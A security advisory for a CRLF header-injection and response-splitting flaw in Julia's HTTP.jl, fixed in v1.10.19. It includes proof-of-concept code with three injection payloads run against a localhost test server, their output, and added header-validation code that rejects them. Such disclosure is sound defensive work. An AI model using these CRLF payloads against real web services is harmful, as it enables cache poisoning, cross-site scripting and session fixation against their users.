PT-2025-46011 · Julia · Http

Published: 2025-10-14 · Updated: 2025-10-14


No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
HTTP.jl did not validate header names/values for illegal characters, allowing CRLF-based header injection and response splitting.
```julia
using HTTP, Sockets

# Test server: echoes the X-Foo request header and reflects the "to" query
# parameter into a Location response header without any validation.
function handle_index(req::HTTP.Request)
  @show HTTP.header(req, "X-Foo")
  return HTTP.Response(200, "ok")
end

function handle_redirect(req::HTTP.Request)
  return HTTP.Response(301, ["Location" => get(HTTP.URIs.queryparams(req), "to", "/")], "redirect")
end

const router = HTTP.Router()
HTTP.register!(router, "GET", "/", handle_index)
HTTP.register!(router, "GET", "/redirect", handle_redirect)

server = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)


println("[*] POC 1: Header injection in request through header key")
# CRLF inside the header name: the client writes the name verbatim, so a second header line appears
user_input = "X-Custom: x\r\nX-Foo: Bar\r\nX-Custom"
HTTP.get("http://localhost:8080/", [user_input => "hello"])

println()

println("[*] POC 2: Header injection in request through header value")
# CRLF inside the header value has the same effect
user_input = "hello\r\nX-Foo: Bar"
HTTP.get("http://localhost:8080/", ["X-Custom" => user_input])

println()

println("[*] POC 3: Header injection in response through header value")
# Percent-encoded CRLF in the query parameter ends up in the server's Location header
res = HTTP.get("http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar", redirect=false)
@show HTTP.header(res, "X-Foo")
```
Result

```
[ Info: Listening on: 0.0.0.0:8080, thread id: 1
[*] POC 1: Header injection in request through header key
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 2: Header injection in request through header value
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 3: Header injection in response through header value
HTTP.header(res, "X-Foo") = "Bar"
```

Impact

This enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.

Patches

This issue is fixed in HTTP.jl v1.10.19.
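The following is an added example, not code from the PoC above and not HTTP.jl's upstream fix: it shows the kind of check the advisory says was missing, restricting header names to RFC 9110 token characters and rejecting CR, LF, NUL and other control characters in values, then runs it against the three PoC payloads (function and constant names are my own).

```julia
# Added example, not HTTP.jl's own code or the upstream patch: the kind of
# header check the advisory says was missing. Names must be RFC 9110 tokens;
# values may not contain CR, LF, NUL or other control characters, which is
# what the CRLF payloads in the PoCs above rely on.

# tchar (RFC 9110 §5.6.2): ASCII letters, digits and these punctuation marks
const TCHAR_EXTRA = Set{Char}("!#\$%&'*+-.^_`|~")

is_tchar(c::Char) = isascii(c) && (isletter(c) || isdigit(c) || c in TCHAR_EXTRA)

valid_header_name(name::AbstractString) = !isempty(name) && all(is_tchar, name)

# HTAB is the only control character allowed inside a field value.
function valid_header_value(value::AbstractString)
    for c in value
        c == '\t' && continue
        cp = codepoint(c)
        (cp < 0x20 || cp == 0x7f) && return false   # includes CR, LF and NUL
    end
    return true
end

# Reject the whole header list if any name or value is illegal.
function check_headers(headers)
    for (name, value) in headers
        valid_header_name(name) || throw(ArgumentError("illegal header name: $(repr(name))"))
        valid_header_value(value) || throw(ArgumentError("illegal header value: $(repr(value))"))
    end
    return headers
end

# Constructed inputs mirroring the three PoCs above (PoC 3 as the decoded ?to= value).
const POC_HEADERS = [
    "X-Custom: x\r\nX-Foo: Bar\r\nX-Custom" => "hello",
    "X-Custom" => "hello\r\nX-Foo: Bar",
    "Location" => "/\r\nX-Foo: Bar",
]

for (name, value) in POC_HEADERS
    try
        check_headers([name => value])
        println("accepted: ", repr(name), " => ", repr(value))
    catch err
        println("rejected: ", err.msg)
    end
end

check_headers(["X-Custom" => "hello"])   # a well-formed header passes unchanged
```

All three PoC inputs are rejected (PoC 1 on the name, PoC 2 and 3 on the value); in the test server above, the same value check belongs on the `to` query parameter before it is placed in `Location`.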

Credit

Chen T

Related Identifiers

JLSEC-2025-40

Affected Products

Http